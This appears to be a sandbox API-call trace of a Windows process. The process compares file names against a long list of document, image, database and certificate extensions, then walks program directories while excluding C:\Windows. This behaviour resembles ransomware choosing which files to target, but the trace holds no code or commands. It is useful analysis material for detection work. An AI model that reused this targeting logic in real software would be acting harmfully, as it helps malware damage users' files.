	[0033.024] lstrcmpiW (lpString1=".cfc", lpString2=".mui") returned -1
	[0033.024] lstrlenW (lpString=".cfm") returned 4
	[0033.024] lstrcmpiW (lpString1=".cfm", lpString2=".mui") returned -1
	[0033.024] lstrlenW (lpString=".cfml") returned 5
	[0033.025] lstrcmpiW (lpString1=".cfml", lpString2="e.mui") returned -1
	[0033.025] lstrlenW (lpString=".cfu") returned 4
	[0033.025] lstrcmpiW (lpString1=".cfu", lpString2=".mui") returned -1
	[0033.025] lstrlenW (lpString=".chm") returned 4
	[0033.025] lstrcmpiW (lpString1=".chm", lpString2=".mui") returned -1
	[0033.025] lstrlenW (lpString=".cin") returned 4
	[0033.025] lstrcmpiW (lpString1=".cin", lpString2=".mui") returned -1
	[0033.025] lstrlenW (lpString=".class") returned 6
	[0033.025] lstrcmpiW (lpString1=".class", lpString2="xe.mui") returned -1
	[0033.025] lstrlenW (lpString=".clx") returned 4
	[0033.025] lstrcmpiW (lpString1=".clx", lpString2=".mui") returned -1
	[0033.025] lstrlenW (lpString=".config") returned 7
	[0033.025] lstrcmpiW (lpString1=".config", lpString2="exe.mui") returned -1
	[0033.025] lstrlenW (lpString=".cpp") returned 4
	[0033.025] lstrcmpiW (lpString1=".cpp", lpString2=".mui") returned -1
	[0033.025] lstrlenW (lpString=".cr2") returned 4
	[0033.025] lstrcmpiW (lpString1=".cr2", lpString2=".mui") returned -1
	[0033.025] lstrlenW (lpString=".crt") returned 4
	[0033.025] lstrcmpiW (lpString1=".crt", lpString2=".mui") returned -1
	[0033.025] lstrlenW (lpString=".crw") returned 4
	[0033.025] lstrcmpiW (lpString1=".crw", lpString2=".mui") returned -1
	[0033.025] lstrlenW (lpString=".cs") returned 3
	[0033.025] lstrcmpiW (lpString1=".cs", lpString2="mui") returned -1
	[0033.025] lstrlenW (lpString=".css") returned 4
	[0033.025] lstrcmpiW (lpString1=".css", lpString2=".mui") returned -1
	[0033.025] lstrlenW (lpString=".csv") returned 4
	[0033.025] lstrcmpiW (lpString1=".csv", lpString2=".mui") returned -1
	[0033.025] lstrlenW (lpString=".cub") returned 4
	[0033.025] lstrcmpiW (lpString1=".cub", lpString2=".mui") returned -1
	[0033.025] lstrlenW (lpString=".dae") returned 4
	[0033.025] lstrcmpiW (lpString1=".dae", lpString2=".mui") returned -1
	[0033.025] lstrlenW (lpString=".dat") returned 4
	[0033.025] lstrcmpiW (lpString1=".dat", lpString2=".mui") returned -1
	[0033.025] lstrlenW (lpString=".db") returned 3
	[0033.025] lstrcmpiW (lpString1=".db", lpString2="mui") returned -1
	[0033.026] lstrlenW (lpString=".dbf") returned 4
	[0033.026] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0033.026] lstrlenW (lpString=".dbx") returned 4
	[0033.026] lstrcmpiW (lpString1=".dbx", lpString2=".mui") returned -1
	[0033.026] lstrlenW (lpString=".dc3") returned 4
	[0033.026] lstrcmpiW (lpString1=".dc3", lpString2=".mui") returned -1
	[0033.026] lstrlenW (lpString=".dcm") returned 4
	[0033.026] lstrcmpiW (lpString1=".dcm", lpString2=".mui") returned -1
	[0033.026] lstrlenW (lpString=".dcr") returned 4
	[0033.026] lstrcmpiW (lpString1=".dcr", lpString2=".mui") returned -1
	[0033.026] lstrlenW (lpString=".der") returned 4
	[0033.026] lstrcmpiW (lpString1=".der", lpString2=".mui") returned -1
	[0033.026] lstrlenW (lpString=".dib") returned 4
	[0033.026] lstrcmpiW (lpString1=".dib", lpString2=".mui") returned -1
	[0033.026] lstrlenW (lpString=".dic") returned 4
	[0033.026] lstrcmpiW (lpString1=".dic", lpString2=".mui") returned -1
	[0033.026] lstrlenW (lpString=".dif") returned 4
	[0033.026] lstrcmpiW (lpString1=".dif", lpString2=".mui") returned -1
	[0033.026] lstrlenW (lpString=".divx") returned 5
	[0033.026] lstrcmpiW (lpString1=".divx", lpString2="e.mui") returned -1
	[0033.026] lstrlenW (lpString=".djvu") returned 5
	[0033.026] lstrcmpiW (lpString1=".djvu", lpString2="e.mui") returned -1
	[0033.026] lstrlenW (lpString=".dng") returned 4
	[0033.026] lstrcmpiW (lpString1=".dng", lpString2=".mui") returned -1
	[0033.026] lstrlenW (lpString=".doc") returned 4
	[0033.026] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0033.026] lstrlenW (lpString=".docm") returned 5
	[0033.026] lstrcmpiW (lpString1=".docm", lpString2="e.mui") returned -1
	[0033.026] lstrlenW (lpString=".docx") returned 5
	[0033.026] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0033.026] lstrlenW (lpString=".dot") returned 4
	[0033.026] lstrcmpiW (lpString1=".dot", lpString2=".mui") returned -1
	[0033.026] lstrlenW (lpString=".dotm") returned 5
	[0033.026] lstrcmpiW (lpString1=".dotm", lpString2="e.mui") returned -1
	[0033.026] lstrlenW (lpString=".dotx") returned 5
	[0033.026] lstrcmpiW (lpString1=".dotx", lpString2="e.mui") returned -1
	[0033.027] lstrlenW (lpString=".dpx") returned 4
	[0033.027] lstrcmpiW (lpString1=".dpx", lpString2=".mui") returned -1
	[0033.027] lstrlenW (lpString=".dqy") returned 4
	[0033.027] lstrcmpiW (lpString1=".dqy", lpString2=".mui") returned -1
	[0033.027] lstrlenW (lpString=".dsn") returned 4
	[0033.027] lstrcmpiW (lpString1=".dsn", lpString2=".mui") returned -1
	[0033.027] lstrlenW (lpString=".dt") returned 3
	[0033.027] lstrcmpiW (lpString1=".dt", lpString2="mui") returned -1
	[0033.027] lstrlenW (lpString=".dtd") returned 4
	[0033.027] lstrcmpiW (lpString1=".dtd", lpString2=".mui") returned -1
	[0033.027] lstrlenW (lpString=".dwg") returned 4
	[0033.027] lstrcmpiW (lpString1=".dwg", lpString2=".mui") returned -1
	[0033.027] lstrlenW (lpString=".dwt") returned 4
	[0033.027] lstrcmpiW (lpString1=".dwt", lpString2=".mui") returned -1
	[0033.027] lstrlenW (lpString=".dx") returned 3
	[0033.027] lstrcmpiW (lpString1=".dx", lpString2="mui") returned -1
	[0033.027] lstrlenW (lpString=".dxf") returned 4
	[0033.027] lstrcmpiW (lpString1=".dxf", lpString2=".mui") returned -1
	[0033.027] lstrlenW (lpString=".edml") returned 5
	[0033.027] lstrcmpiW (lpString1=".edml", lpString2="e.mui") returned -1
	[0033.027] lstrlenW (lpString=".efd") returned 4
	[0033.027] lstrcmpiW (lpString1=".efd", lpString2=".mui") returned -1
	[0033.027] lstrlenW (lpString=".elf") returned 4
	[0033.027] lstrcmpiW (lpString1=".elf", lpString2=".mui") returned -1
	[0033.027] lstrlenW (lpString=".emf") returned 4
	[0033.027] lstrcmpiW (lpString1=".emf", lpString2=".mui") returned -1
	[0033.027] lstrlenW (lpString=".emz") returned 4
	[0033.027] lstrcmpiW (lpString1=".emz", lpString2=".mui") returned -1
	[0033.027] lstrlenW (lpString=".epf") returned 4
	[0033.027] lstrcmpiW (lpString1=".epf", lpString2=".mui") returned -1
	[0033.027] lstrlenW (lpString=".eps") returned 4
	[0033.027] lstrcmpiW (lpString1=".eps", lpString2=".mui") returned -1
	[0033.027] lstrlenW (lpString=".epsf") returned 5
	[0033.027] lstrcmpiW (lpString1=".epsf", lpString2="e.mui") returned -1
	[0033.027] lstrlenW (lpString=".epsp") returned 5
	[0033.027] lstrcmpiW (lpString1=".epsp", lpString2="e.mui") returned -1
	[0033.027] lstrlenW (lpString=".erf") returned 4
	[0033.028] lstrcmpiW (lpString1=".erf", lpString2=".mui") returned -1
	[0033.028] lstrlenW (lpString=".exr") returned 4
	[0033.028] lstrcmpiW (lpString1=".exr", lpString2=".mui") returned -1
	[0033.028] lstrlenW (lpString=".f4v") returned 4
	[0033.028] lstrcmpiW (lpString1=".f4v", lpString2=".mui") returned -1
	[0033.028] lstrlenW (lpString=".fido") returned 5
	[0033.028] lstrcmpiW (lpString1=".fido", lpString2="e.mui") returned -1
	[0033.028] lstrlenW (lpString=".flm") returned 4
	[0033.028] lstrcmpiW (lpString1=".flm", lpString2=".mui") returned -1
	[0033.028] lstrlenW (lpString=".flv") returned 4
	[0033.028] lstrcmpiW (lpString1=".flv", lpString2=".mui") returned -1
	[0033.028] lstrlenW (lpString=".frm") returned 4
	[0033.028] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1
	[0033.028] lstrlenW (lpString=".fxg") returned 4
	[0033.028] lstrcmpiW (lpString1=".fxg", lpString2=".mui") returned -1
	[0033.028] lstrlenW (lpString=".geo") returned 4
	[0033.028] lstrcmpiW (lpString1=".geo", lpString2=".mui") returned -1
	[0033.028] lstrlenW (lpString=".gif") returned 4
	[0033.028] lstrcmpiW (lpString1=".gif", lpString2=".mui") returned -1
	[0033.028] lstrlenW (lpString=".grs") returned 4
	[0033.028] lstrcmpiW (lpString1=".grs", lpString2=".mui") returned -1
	[0033.028] lstrlenW (lpString=".gz") returned 3
	[0033.028] lstrcmpiW (lpString1=".gz", lpString2="mui") returned -1
	[0033.028] lstrlenW (lpString=".h") returned 2
	[0033.028] lstrcmpiW (lpString1=".h", lpString2="ui") returned -1
	[0033.028] lstrlenW (lpString=".hdr") returned 4
	[0033.028] lstrcmpiW (lpString1=".hdr", lpString2=".mui") returned -1
	[0033.028] lstrlenW (lpString=".hpp") returned 4
	[0033.028] lstrcmpiW (lpString1=".hpp", lpString2=".mui") returned -1
	[0033.028] lstrlenW (lpString=".hta") returned 4
	[0033.028] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1
	[0033.028] lstrlenW (lpString=".htc") returned 4
	[0033.028] lstrcmpiW (lpString1=".htc", lpString2=".mui") returned -1
	[0033.028] lstrlenW (lpString=".htm") returned 4
	[0033.028] lstrcmpiW (lpString1=".htm", lpString2=".mui") returned -1
	[0033.028] lstrlenW (lpString=".html") returned 5
	[0033.029] lstrcmpiW (lpString1=".html", lpString2="e.mui") returned -1
	[0033.029] lstrlenW (lpString=".icb") returned 4
	[0033.029] lstrcmpiW (lpString1=".icb", lpString2=".mui") returned -1
	[0033.029] lstrlenW (lpString=".ics") returned 4
	[0033.029] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1
	[0033.029] lstrlenW (lpString=".iff") returned 4
	[0033.029] lstrcmpiW (lpString1=".iff", lpString2=".mui") returned -1
	[0033.029] lstrlenW (lpString=".inc") returned 4
	[0033.029] lstrcmpiW (lpString1=".inc", lpString2=".mui") returned -1
	[0033.029] lstrlenW (lpString=".indd") returned 5
	[0033.029] lstrcmpiW (lpString1=".indd", lpString2="e.mui") returned -1
	[0033.029] lstrlenW (lpString=".ini") returned 4
	[0033.029] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1
	[0033.029] lstrlenW (lpString=".iqy") returned 4
	[0033.029] lstrcmpiW (lpString1=".iqy", lpString2=".mui") returned -1
	[0033.029] lstrlenW (lpString=".j2c") returned 4
	[0033.029] lstrcmpiW (lpString1=".j2c", lpString2=".mui") returned -1
	[0033.029] lstrlenW (lpString=".j2k") returned 4
	[0033.029] lstrcmpiW (lpString1=".j2k", lpString2=".mui") returned -1
	[0033.029] lstrlenW (lpString=".java") returned 5
	[0033.029] lstrcmpiW (lpString1=".java", lpString2="e.mui") returned -1
	[0033.029] lstrlenW (lpString=".jp2") returned 4
	[0033.029] lstrcmpiW (lpString1=".jp2", lpString2=".mui") returned -1
	[0033.029] lstrlenW (lpString=".jpc") returned 4
	[0033.029] lstrcmpiW (lpString1=".jpc", lpString2=".mui") returned -1
	[0033.029] lstrlenW (lpString=".jpe") returned 4
	[0033.029] lstrcmpiW (lpString1=".jpe", lpString2=".mui") returned -1
	[0033.029] lstrlenW (lpString=".jpeg") returned 5
	[0033.029] lstrcmpiW (lpString1=".jpeg", lpString2="e.mui") returned -1
	[0033.029] lstrlenW (lpString=".jpf") returned 4
	[0033.029] lstrcmpiW (lpString1=".jpf", lpString2=".mui") returned -1
	[0033.029] lstrlenW (lpString=".jpg") returned 4
	[0033.029] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0033.029] lstrlenW (lpString=".jpx") returned 4
	[0033.029] lstrcmpiW (lpString1=".jpx", lpString2=".mui") returned -1
	[0033.029] lstrlenW (lpString=".js") returned 3
	[0033.030] lstrcmpiW (lpString1=".js", lpString2="mui") returned -1
	[0033.030] lstrlenW (lpString=".jsf") returned 4
	[0033.030] lstrcmpiW (lpString1=".jsf", lpString2=".mui") returned -1
	[0033.030] lstrlenW (lpString=".json") returned 5
	[0033.030] lstrcmpiW (lpString1=".json", lpString2="e.mui") returned -1
	[0033.030] lstrlenW (lpString=".jsp") returned 4
	[0033.030] lstrcmpiW (lpString1=".jsp", lpString2=".mui") returned -1
	[0033.030] lstrlenW (lpString=".kdc") returned 4
	[0033.030] lstrcmpiW (lpString1=".kdc", lpString2=".mui") returned -1
	[0033.030] lstrlenW (lpString=".kmz") returned 4
	[0033.030] lstrcmpiW (lpString1=".kmz", lpString2=".mui") returned -1
	[0033.030] lstrlenW (lpString=".kwm") returned 4
	[0033.030] lstrcmpiW (lpString1=".kwm", lpString2=".mui") returned -1
	[0033.030] lstrlenW (lpString=".lasso") returned 6
	[0033.030] lstrcmpiW (lpString1=".lasso", lpString2="xe.mui") returned -1
	[0033.030] lstrlenW (lpString=".lbi") returned 4
	[0033.030] lstrcmpiW (lpString1=".lbi", lpString2=".mui") returned -1
	[0033.030] lstrlenW (lpString=".lgf") returned 4
	[0033.030] lstrcmpiW (lpString1=".lgf", lpString2=".mui") returned -1
	[0033.030] lstrlenW (lpString=".lgp") returned 4
	[0033.030] lstrcmpiW (lpString1=".lgp", lpString2=".mui") returned -1
	[0033.030] lstrlenW (lpString=".log") returned 4
	[0033.030] lstrcmpiW (lpString1=".log", lpString2=".mui") returned -1
	[0033.030] lstrlenW (lpString=".m1v") returned 4
	[0033.030] lstrcmpiW (lpString1=".m1v", lpString2=".mui") returned -1
	[0033.030] lstrlenW (lpString=".m4a") returned 4
	[0033.030] lstrcmpiW (lpString1=".m4a", lpString2=".mui") returned -1
	[0033.030] lstrlenW (lpString=".m4v") returned 4
	[0033.030] lstrcmpiW (lpString1=".m4v", lpString2=".mui") returned -1
	[0033.030] lstrlenW (lpString=".max") returned 4
	[0033.030] lstrcmpiW (lpString1=".max", lpString2=".mui") returned -1
	[0033.030] lstrlenW (lpString=".md") returned 3
	[0033.030] lstrcmpiW (lpString1=".md", lpString2="mui") returned -1
	[0033.030] lstrlenW (lpString=".mda") returned 4
	[0033.030] lstrcmpiW (lpString1=".mda", lpString2=".mui") returned -1
	[0033.030] lstrlenW (lpString=".mdb") returned 4
	[0033.030] lstrcmpiW (lpString1=".mdb", lpString2=".mui") returned -1
	[0033.031] lstrlenW (lpString=".mde") returned 4
	[0033.031] lstrcmpiW (lpString1=".mde", lpString2=".mui") returned -1
	[0033.031] lstrlenW (lpString=".mdf") returned 4
	[0033.031] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1
	[0033.031] lstrlenW (lpString=".mdw") returned 4
	[0033.031] lstrcmpiW (lpString1=".mdw", lpString2=".mui") returned -1
	[0033.031] lstrlenW (lpString=".mef") returned 4
	[0033.031] lstrcmpiW (lpString1=".mef", lpString2=".mui") returned -1
	[0033.031] lstrlenW (lpString=".mft") returned 4
	[0033.031] lstrcmpiW (lpString1=".mft", lpString2=".mui") returned -1
	[0033.031] lstrlenW (lpString=".mfw") returned 4
	[0033.031] lstrcmpiW (lpString1=".mfw", lpString2=".mui") returned -1
	[0033.031] lstrlenW (lpString=".mht") returned 4
	[0033.031] lstrcmpiW (lpString1=".mht", lpString2=".mui") returned -1
	[0033.031] lstrlenW (lpString=".mhtml") returned 6
	[0033.031] lstrcmpiW (lpString1=".mhtml", lpString2="xe.mui") returned -1
	[0033.031] lstrlenW (lpString=".mka") returned 4
	[0033.031] lstrcmpiW (lpString1=".mka", lpString2=".mui") returned -1
	[0033.031] lstrlenW (lpString=".mkidx") returned 6
	[0033.031] lstrcmpiW (lpString1=".mkidx", lpString2="xe.mui") returned -1
	[0033.031] lstrlenW (lpString=".mkv") returned 4
	[0033.031] lstrcmpiW (lpString1=".mkv", lpString2=".mui") returned -1
	[0033.031] lstrlenW (lpString=".mos") returned 4
	[0033.031] lstrcmpiW (lpString1=".mos", lpString2=".mui") returned -1
	[0033.031] lstrlenW (lpString=".mov") returned 4
	[0033.031] lstrcmpiW (lpString1=".mov", lpString2=".mui") returned -1
	[0033.031] lstrlenW (lpString=".mp3") returned 4
	[0033.031] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1
	[0033.031] lstrlenW (lpString=".mp4") returned 4
	[0033.031] lstrcmpiW (lpString1=".mp4", lpString2=".mui") returned -1
	[0033.031] lstrlenW (lpString=".mpeg") returned 5
	[0033.031] lstrcmpiW (lpString1=".mpeg", lpString2="e.mui") returned -1
	[0033.031] lstrlenW (lpString=".mpg") returned 4
	[0033.031] lstrcmpiW (lpString1=".mpg", lpString2=".mui") returned -1
	[0033.031] lstrlenW (lpString=".mpv") returned 4
	[0033.031] lstrcmpiW (lpString1=".mpv", lpString2=".mui") returned -1
	[0033.032] lstrlenW (lpString=".mrw") returned 4
	[0033.032] lstrcmpiW (lpString1=".mrw", lpString2=".mui") returned -1
	[0033.032] lstrlenW (lpString=".msg") returned 4
	[0033.032] lstrcmpiW (lpString1=".msg", lpString2=".mui") returned -1
	[0033.032] lstrlenW (lpString=".mxl") returned 4
	[0033.032] lstrcmpiW (lpString1=".mxl", lpString2=".mui") returned 1
	[0033.032] lstrlenW (lpString=".myd") returned 4
	[0033.032] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1
	[0033.032] lstrlenW (lpString=".myi") returned 4
	[0033.032] lstrcmpiW (lpString1=".myi", lpString2=".mui") returned 1
	[0033.032] lstrlenW (lpString=".nef") returned 4
	[0033.032] lstrcmpiW (lpString1=".nef", lpString2=".mui") returned 1
	[0033.032] lstrlenW (lpString=".nrw") returned 4
	[0033.033] lstrcmpiW (lpString1=".nrw", lpString2=".mui") returned 1
	[0033.033] lstrlenW (lpString=".obj") returned 4
	[0033.033] lstrcmpiW (lpString1=".obj", lpString2=".mui") returned 1
	[0033.033] lstrlenW (lpString=".odb") returned 4
	[0033.033] lstrcmpiW (lpString1=".odb", lpString2=".mui") returned 1
	[0033.033] lstrlenW (lpString=".odc") returned 4
	[0033.033] lstrcmpiW (lpString1=".odc", lpString2=".mui") returned 1
	[0033.033] lstrlenW (lpString=".odm") returned 4
	[0033.033] lstrcmpiW (lpString1=".odm", lpString2=".mui") returned 1
	[0033.033] lstrlenW (lpString=".odp") returned 4
	[0033.033] lstrcmpiW (lpString1=".odp", lpString2=".mui") returned 1
	[0033.033] lstrlenW (lpString=".ods") returned 4
	[0033.033] lstrcmpiW (lpString1=".ods", lpString2=".mui") returned 1
	[0033.033] lstrlenW (lpString=".oft") returned 4
	[0033.033] lstrcmpiW (lpString1=".oft", lpString2=".mui") returned 1
	[0033.033] lstrlenW (lpString=".one") returned 4
	[0033.033] lstrcmpiW (lpString1=".one", lpString2=".mui") returned 1
	[0033.033] lstrlenW (lpString=".onepkg") returned 7
	[0033.033] lstrcmpiW (lpString1=".onepkg", lpString2="exe.mui") returned -1
	[0033.033] lstrlenW (lpString=".onetoc2") returned 8
	[0033.033] lstrcmpiW (lpString1=".onetoc2", lpString2=".exe.mui") returned 1
	[0033.033] lstrlenW (lpString=".opt") returned 4
	[0033.033] lstrcmpiW (lpString1=".opt", lpString2=".mui") returned 1
	[0033.033] lstrlenW (lpString=".oqy") returned 4
	[0033.033] lstrcmpiW (lpString1=".oqy", lpString2=".mui") returned 1
	[0033.033] lstrlenW (lpString=".orf") returned 4
	[0033.033] lstrcmpiW (lpString1=".orf", lpString2=".mui") returned 1
	[0033.033] lstrlenW (lpString=".p12") returned 4
	[0033.033] lstrcmpiW (lpString1=".p12", lpString2=".mui") returned 1
	[0033.033] lstrlenW (lpString=".p7b") returned 4
	[0033.033] lstrcmpiW (lpString1=".p7b", lpString2=".mui") returned 1
	[0033.033] lstrlenW (lpString=".p7c") returned 4
	[0033.033] lstrcmpiW (lpString1=".p7c", lpString2=".mui") returned 1
	[0033.033] lstrlenW (lpString=".pam") returned 4
	[0033.033] lstrcmpiW (lpString1=".pam", lpString2=".mui") returned 1
	[0033.033] lstrlenW (lpString=".pbm") returned 4
	[0033.034] lstrcmpiW (lpString1=".pbm", lpString2=".mui") returned 1
	[0033.034] lstrlenW (lpString=".pct") returned 4
	[0033.034] lstrcmpiW (lpString1=".pct", lpString2=".mui") returned 1
	[0033.034] lstrlenW (lpString=".pcx") returned 4
	[0033.034] lstrcmpiW (lpString1=".pcx", lpString2=".mui") returned 1
	[0033.034] lstrlenW (lpString=".pdd") returned 4
	[0033.034] lstrcmpiW (lpString1=".pdd", lpString2=".mui") returned 1
	[0033.034] lstrlenW (lpString=".pdf") returned 4
	[0033.034] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0033.034] lstrlenW (lpString=".pdp") returned 4
	[0033.034] lstrcmpiW (lpString1=".pdp", lpString2=".mui") returned 1
	[0033.034] lstrlenW (lpString=".pef") returned 4
	[0033.034] lstrcmpiW (lpString1=".pef", lpString2=".mui") returned 1
	[0033.034] lstrlenW (lpString=".pem") returned 4
	[0033.034] lstrcmpiW (lpString1=".pem", lpString2=".mui") returned 1
	[0033.034] lstrlenW (lpString=".pff") returned 4
	[0033.034] lstrcmpiW (lpString1=".pff", lpString2=".mui") returned 1
	[0033.034] lstrlenW (lpString=".pfm") returned 4
	[0033.034] lstrcmpiW (lpString1=".pfm", lpString2=".mui") returned 1
	[0033.034] lstrlenW (lpString=".pfx") returned 4
	[0033.034] lstrcmpiW (lpString1=".pfx", lpString2=".mui") returned 1
	[0033.034] lstrlenW (lpString=".pgm") returned 4
	[0033.034] lstrcmpiW (lpString1=".pgm", lpString2=".mui") returned 1
	[0033.034] lstrlenW (lpString=".php") returned 4
	[0033.034] lstrcmpiW (lpString1=".php", lpString2=".mui") returned 1
	[0033.034] lstrlenW (lpString=".php3") returned 5
	[0033.034] lstrcmpiW (lpString1=".php3", lpString2="e.mui") returned -1
	[0033.034] lstrlenW (lpString=".php4") returned 5
	[0033.034] lstrcmpiW (lpString1=".php4", lpString2="e.mui") returned -1
	[0033.034] lstrlenW (lpString=".php5") returned 5
	[0033.034] lstrcmpiW (lpString1=".php5", lpString2="e.mui") returned -1
	[0033.034] lstrlenW (lpString=".phtml") returned 6
	[0033.034] lstrcmpiW (lpString1=".phtml", lpString2="xe.mui") returned -1
	[0033.034] lstrlenW (lpString=".pict") returned 5
	[0033.034] lstrcmpiW (lpString1=".pict", lpString2="e.mui") returned -1
	[0033.034] lstrlenW (lpString=".pl") returned 3
	[0033.035] lstrcmpiW (lpString1=".pl", lpString2="mui") returned -1
	[0033.035] lstrlenW (lpString=".pls") returned 4
	[0033.035] lstrcmpiW (lpString1=".pls", lpString2=".mui") returned 1
	[0033.035] lstrlenW (lpString=".pm") returned 3
	[0033.035] lstrcmpiW (lpString1=".pm", lpString2="mui") returned -1
	[0033.035] lstrlenW (lpString=".png") returned 4
	[0033.035] lstrcmpiW (lpString1=".png", lpString2=".mui") returned 1
	[0033.035] lstrlenW (lpString=".pnm") returned 4
	[0033.035] lstrcmpiW (lpString1=".pnm", lpString2=".mui") returned 1
	[0033.035] lstrlenW (lpString=".pot") returned 4
	[0033.035] lstrcmpiW (lpString1=".pot", lpString2=".mui") returned 1
	[0033.035] lstrlenW (lpString=".potm") returned 5
	[0033.035] lstrcmpiW (lpString1=".potm", lpString2="e.mui") returned -1
	[0033.035] lstrlenW (lpString=".potx") returned 5
	[0033.035] lstrcmpiW (lpString1=".potx", lpString2="e.mui") returned -1
	[0033.035] lstrlenW (lpString=".ppa") returned 4
	[0033.035] lstrcmpiW (lpString1=".ppa", lpString2=".mui") returned 1
	[0033.035] lstrlenW (lpString=".ppam") returned 5
	[0033.035] lstrcmpiW (lpString1=".ppam", lpString2="e.mui") returned -1
	[0033.035] lstrlenW (lpString=".ppm") returned 4
	[0033.035] lstrcmpiW (lpString1=".ppm", lpString2=".mui") returned 1
	[0033.035] lstrlenW (lpString=".pps") returned 4
	[0033.035] lstrcmpiW (lpString1=".pps", lpString2=".mui") returned 1
	[0033.035] lstrlenW (lpString=".ppsm") returned 5
	[0033.035] lstrcmpiW (lpString1=".ppsm", lpString2="e.mui") returned -1
	[0033.035] lstrlenW (lpString=".ppt") returned 4
	[0033.035] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0033.035] lstrlenW (lpString=".pptm") returned 5
	[0033.035] lstrcmpiW (lpString1=".pptm", lpString2="e.mui") returned -1
	[0033.035] lstrlenW (lpString=".pptx") returned 5
	[0033.035] lstrcmpiW (lpString1=".pptx", lpString2="e.mui") returned -1
	[0033.035] lstrlenW (lpString=".prn") returned 4
	[0033.035] lstrcmpiW (lpString1=".prn", lpString2=".mui") returned 1
	[0033.035] lstrlenW (lpString=".ps") returned 3
	[0033.035] lstrcmpiW (lpString1=".ps", lpString2="mui") returned -1
	[0033.035] lstrlenW (lpString=".psb") returned 4
	[0033.036] lstrcmpiW (lpString1=".psb", lpString2=".mui") returned 1
	[0033.036] lstrlenW (lpString=".psd") returned 4
	[0033.036] lstrcmpiW (lpString1=".psd", lpString2=".mui") returned 1
	[0033.036] lstrlenW (lpString=".pst") returned 4
	[0033.036] lstrcmpiW (lpString1=".pst", lpString2=".mui") returned 1
	[0033.036] lstrlenW (lpString=".ptx") returned 4
	[0033.036] lstrcmpiW (lpString1=".ptx", lpString2=".mui") returned 1
	[0033.036] lstrlenW (lpString=".pub") returned 4
	[0033.036] lstrcmpiW (lpString1=".pub", lpString2=".mui") returned 1
	[0033.036] lstrlenW (lpString=".pwm") returned 4
	[0033.036] lstrcmpiW (lpString1=".pwm", lpString2=".mui") returned 1
	[0033.036] lstrlenW (lpString=".pxr") returned 4
	[0033.036] lstrcmpiW (lpString1=".pxr", lpString2=".mui") returned 1
	[0033.036] lstrlenW (lpString=".py") returned 3
	[0033.036] lstrcmpiW (lpString1=".py", lpString2="mui") returned -1
	[0033.036] lstrlenW (lpString=".qt") returned 3
	[0033.036] lstrcmpiW (lpString1=".qt", lpString2="mui") returned -1
	[0033.036] lstrlenW (lpString=".r3d") returned 4
	[0033.036] lstrcmpiW (lpString1=".r3d", lpString2=".mui") returned 1
	[0033.036] lstrlenW (lpString=".raf") returned 4
	[0033.036] lstrcmpiW (lpString1=".raf", lpString2=".mui") returned 1
	[0033.036] lstrlenW (lpString=".rar") returned 4
	[0033.036] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0033.036] lstrlenW (lpString=".raw") returned 4
	[0033.036] lstrcmpiW (lpString1=".raw", lpString2=".mui") returned 1
	[0043.561] FindNextFileW (in: hFindFile=0xb430148, lpFindFileData=0xa91f808 | out: lpFindFileData=0xa91f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0043.561] FindNextFileW (in: hFindFile=0xb430148, lpFindFileData=0xa91f808 | out: lpFindFileData=0xa91f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1
	[0043.561] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Program Files\\Windows Mail\\en-US") returned 1
	[0043.561] lstrcmpiW (lpString1="C:\\Windows", lpString2="en-US") returned -1
	[0043.561] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xb4db740
	[0043.562] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Mail\\en-US\\*", lpFindFileData=0xa91f58c | out: lpFindFileData=0xa91f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb430248
	[0043.562] FindNextFileW (in: hFindFile=0xb430248, lpFindFileData=0xa91f58c | out: lpFindFileData=0xa91f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
